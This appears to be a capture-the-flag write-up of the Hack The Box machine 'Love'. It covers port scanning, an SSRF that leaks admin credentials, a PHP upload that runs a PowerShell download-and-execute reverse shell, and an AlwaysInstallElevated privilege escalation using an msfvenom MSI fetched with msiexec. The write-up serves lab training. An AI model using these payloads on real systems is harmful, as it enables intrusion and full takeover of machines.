I"!:<p><strong>Love</strong> is an easy box, Awesome for beginners. Starts with a <strong>SSRF</strong> to access a <strong>forbidden page</strong> meant to be accessed <strong>locally</strong> which <strong>leaks credentials</strong> for a Voting system. That voting system allows anyone to upload images. By <strong>exploiting upload</strong> functionality, I achieve RCE. Finally, I get system by <strong>abusing AlwaysInstallElevated</strong>.</p>
<h1 id="masscan--nmap">Masscan + Nmap</h1>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>masscan <span class="nt">-p1-65535</span>,U:1-65535  10.10.10.239  <span class="nt">--rate</span><span class="o">=</span>10000 <span class="nt">-e</span> tun0 | <span class="nb">tee </span>masscan.out

Starting masscan 1.0.5 <span class="o">(</span>http://bit.ly/14GZzcT<span class="o">)</span> at 2021-07-01 10:05:53 GMT
 <span class="nt">--</span> forced options: <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-n</span> <span class="nt">--randomize-hosts</span> <span class="nt">-v</span> <span class="nt">--send-eth</span>
Initiating SYN Stealth Scan
Scanning 1 hosts <span class="o">[</span>131070 ports/host]
Discovered open port 445/tcp on 10.10.10.239
Discovered open port 3306/tcp on 10.10.10.239
Discovered open port 49670/tcp on 10.10.10.239
Discovered open port 135/tcp on 10.10.10.239
Discovered open port 5000/tcp on 10.10.10.239
Discovered open port 49666/tcp on 10.10.10.239
Discovered open port 49668/tcp on 10.10.10.239
Discovered open port 139/tcp on 10.10.10.239
Discovered open port 7680/tcp on 10.10.10.239
Discovered open port 80/tcp on 10.10.10.239
Discovered open port 49665/tcp on 10.10.10.239
Discovered open port 49664/tcp on 10.10.10.239
Discovered open port 443/tcp on 10.10.10.239
Discovered open port 5986/tcp on 10.10.10.239
Discovered open port 5040/tcp on 10.10.10.239
Discovered open port 5985/tcp on 10.10.10.239
Discovered open port 49669/tcp on 10.10.10.239
Discovered open port 47001/tcp on 10.10.10.239
Discovered open port 49667/tcp on 10.10.10.239
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Parse those ports to nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ ports</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat </span>masscan.out |awk <span class="s1">'{ print $4 }'</span> | <span class="nb">sed</span> <span class="s1">'s/\/tcp//'</span> | <span class="nb">tr</span> <span class="s1">'\n'</span> <span class="s1">','</span> | <span class="nb">sed</span> <span class="s1">'s/,$//'</span><span class="si">)</span>
<span class="nv">$ </span>nmap <span class="nt">-sVC</span> <span class="nt">-v</span> <span class="nt">--min-rate</span> 1000 <span class="nt">-p</span> <span class="nv">$ports</span> 10.10.10.239 <span class="nt">-oN</span> nmap-fullscan.out
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 <span class="o">((</span>Win64<span class="o">)</span> OpenSSL/1.1.1j PHP/7.3.27<span class="o">)</span>
|_http-server-header: Apache/2.4.46 <span class="o">(</span>Win64<span class="o">)</span> OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Secure file scanner
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 <span class="o">(</span>OpenSSL/1.1.1j PHP/7.3.27<span class="o">)</span>
|_http-server-header: Apache/2.4.46 <span class="o">(</span>Win64<span class="o">)</span> OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>staging.love.htb/organizationName<span class="o">=</span>ValentineCorp/stateOrProvinceName<span class="o">=</span>m/countryName<span class="o">=</span><span class="k">in</span>
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent <span class="nb">time</span>
| tls-alpn:
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span>
3306/tcp  open  mysql?
| fingerprint-strings:
|   NULL:
|_    Host <span class="s1">'10.10.14.5'</span> is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 <span class="o">(</span>OpenSSL/1.1.1j PHP/7.3.27<span class="o">)</span>
|_http-server-header: Apache/2.4.46 <span class="o">(</span>Win64<span class="o">)</span> OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-07-01T10:37:43+00:00<span class="p">;</span> +21m33s from scanner time.
| tls-alpn:
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
</pre></td></tr></tbody></table></code></pre></div></div>
<ul>
  <li>We get <code class="language-plaintext highlighter-rouge">staging.love.htb</code> &amp; <code class="language-plaintext highlighter-rouge">love.htb</code> through https certificate shown in the nmap output.</li>
  <li>Port 5000 hosting a http server is forbidden.</li>
  <li>MySQL server is running on port 3306.</li>
</ul>

<h1 id="foothold">Foothold</h1>
<p>Port 80 and 443 host the same content, showing a login page of voting system:
<img src="/assets/img/Posts/Love/love-1.png" alt="love-1.png" />
Whereas http://staging.love.htb/ shows something else:
<img src="/assets/img/Posts/Love/love-2.png" alt="love-2.png" /></p>

<h2 id="directory-brute-forcing">Directory brute-forcing</h2>
<p>Directory brute-forcing on http://10.10.10.239/ gives us an admin panel with the same login page.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
</pre></td> --><td class="rouge-code"><pre>ffuf <span class="nt">-u</span> http://10.10.10.239/FUZZ <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt <span class="nt">-mc</span> 200,204,301,302,307

        /<span class="s1">'___\  /'</span>___<span class="se">\ </span>          /<span class="s1">'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive &lt;3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.239/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307
________________________________________________

admin                   [Status: 301, Size: 337, Words: 22, Lines: 10]
images                  [Status: 301, Size: 338, Words: 22, Lines: 10]
includes                [Status: 301, Size: 340, Words: 22, Lines: 10]
plugins                 [Status: 301, Size: 339, Words: 22, Lines: 10]
Admin                   [Status: 301, Size: 337, Words: 22, Lines: 10]
Images                  [Status: 301, Size: 338, Words: 22, Lines: 10]
.                       [Status: 200, Size: 4388, Words: 654, Lines: 126]
Includes                [Status: 301, Size: 340, Words: 22, Lines: 10]
ADMIN                   [Status: 301, Size: 337, Words: 22, Lines: 10]
dist                    [Status: 301, Size: 336, Words: 22, Lines: 10]
IMAGES                  [Status: 301, Size: 338, Words: 22, Lines: 10]
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="staginglovehtb">staging.love.htb</h2>
<p>There’s a file scanning feature in beta: http://staging.love.htb/beta.php 
<img src="/assets/img/Posts/Love/love-3.png" alt="love-3.png" /></p>

<p>Trying for SSRF straight-away:</p>
<ul>
  <li>Started a python http server on port 8000</li>
  <li>Gave http://my-tun0-ip:8000</li>
  <li>Received callbacks.</li>
</ul>

<p>Trying for code-execution through SSRF:</p>
<ul>
  <li>Made a php file with <code class="language-plaintext highlighter-rouge">&lt;?phpinfo();?&gt;</code> and tried to fetch it, no code executed, just displayed the contents of the file.</li>
</ul>

<p>Trying to access that forbidden internal port 5000 gives:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">admin:@LoveIsInTheAir!!!!</code></li>
</ul>

<p><img src="/assets/img/Posts/Love/love-4.png" alt="love-4.png" /></p>

<h2 id="admin-panel-on-voting-system">Admin panel on voting system</h2>
<p><code class="language-plaintext highlighter-rouge">admin:@LoveIsInTheAir!!!!</code> works on http://10.10.10.239/admin/ 
<img src="/assets/img/Posts/Love/love-5.png" alt="love-5.png" /></p>

<p>The Voters List and profile edit section allows us to upload an image. 
Uploading a php script instead of an image works!
<img src="/assets/img/Posts/Love/love-6.png" alt="love-6.png" /></p>

<h2 id="reverse-shell-as-phoebe">Reverse shell as phoebe</h2>
<p>Uploaded a php script to get reverse-shell with <code class="language-plaintext highlighter-rouge">Invoke-PowerShellTcp</code>:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="cp">&lt;?php</span> <span class="nb">exec</span><span class="p">(</span><span class="s2">"powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444"</span><span class="p">);</span> <span class="cp">?&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Access the script at /images, start a http-server and get rev-shell:
<img src="/assets/img/Posts/Love/love-7.png" alt="love-7.png" /></p>

<h1 id="privesc-via-alwaysinstallelevated">Privesc via AlwaysInstallElevated</h1>
<p>Fetch winpeas binary with <code class="language-plaintext highlighter-rouge">Invoke-WebRequest</code>:</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="n">PS</span><span class="w"> </span><span class="nx">C:\xampp\htdocs\omrs\images</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">iwr</span><span class="w"> </span><span class="nx">http://10.10.14.5/peas/winpeasany.exe</span><span class="w"> </span><span class="nt">-o</span><span class="w"> </span><span class="nx">winpeas.exe</span><span class="w">
</span></pre></td></tr></tbody></table></code></pre></div></div>
<p>Executing winpeas gives:
<img src="/assets/img/Posts/Love/love-8.png" alt="love-8.png" /></p>

<p>If these 2 registers (<code class="language-plaintext highlighter-rouge">HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer</code> and <code class="language-plaintext highlighter-rouge">HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer</code>) are enabled (value is 0x1), then users of any privilege can install (execute) msi files as <code class="language-plaintext highlighter-rouge">NT AUTHORITY\SYSTEM</code>.</p>

<ol>
  <li>Generate a reverse shell spawning msi file with msfvenom:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre> msfvenom <span class="nt">-p</span> windows/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.5 <span class="nv">LPORT</span><span class="o">=</span>4444 <span class="nt">-f</span> msi <span class="nt">-o</span> revshell.msi
</pre></td></tr></tbody></table></code></pre></div>    </div>
  </li>
  <li>Setup a http listener with access to that <code class="language-plaintext highlighter-rouge">revshell.msi</code> file and execute that <code class="language-plaintext highlighter-rouge">revshell.msi</code> using <code class="language-plaintext highlighter-rouge">msiexec</code>:
    <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="w"> </span><span class="n">msiexec</span><span class="w"> </span><span class="nx">/q</span><span class="w"> </span><span class="nx">/i</span><span class="w"> </span><span class="nx">http://10.10.14.5/revshell.msi</span><span class="w">
</span></pre></td></tr></tbody></table></code></pre></div>    </div>
    <p>OR
 Transfer <code class="language-plaintext highlighter-rouge">revshell.msi</code> and execute it: <code class="language-plaintext highlighter-rouge">.\revshell.msi</code>
<img src="/assets/img/Posts/Love/love-9.png" alt="love-9.png" /></p>
  </li>
</ol>

:ET